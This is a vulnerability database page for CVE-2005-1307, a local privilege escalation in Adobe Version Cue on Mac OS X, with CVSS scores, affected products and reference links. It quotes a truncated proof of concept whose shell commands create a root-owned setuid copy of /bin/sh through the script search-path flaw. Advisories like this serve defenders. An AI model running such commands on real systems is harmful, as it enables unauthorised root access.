Published: 17/05/2005 Updated: 11/07/2017

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 725

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

The (1) stopserver.sh and (2) startserver.sh scripts in Adobe Version Cue on Mac OS X uses the current working directory to find and execute the productname.sh script, which allows local users to execute arbitrary code by copying and calling the scripts from a user-controlled directory.

Vulnerable Product	Search on Vulmon	Subscribe to Product
adobe version cue gold
apple mac os x 10.3.6

Proof of concept: haven:~ fintler$ cd ~ haven:~ fintler$ id uid=502(fintler) gid=500(fintler) groups=500(fintler) haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh" > productnamesh haven:~ fintler$ chmod 0755 /productnamesh haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver ...

NVD-CWE-Other http://www.securiteam.com/exploits/5EP0D20FQC.html http://archives.neohapsis.com/archives/bugtraq/2004-12/0040.html http://www.adobe.com/support/techdocs/331621.html http://www.securityfocus.com/bid/11833 http://www.osvdb.org/12297 http://www.osvdb.org/12298 http://securitytracker.com/id?1012446 http://secunia.com/advisories/13399 http://marc.info/?l=bugtraq&m=111627622403544&w=2 https://exchange.xforce.ibmcloud.com/vulnerabilities/18445 https://nvd.nist.gov https://www.exploit-db.com/exploits/680/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2005-1307

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect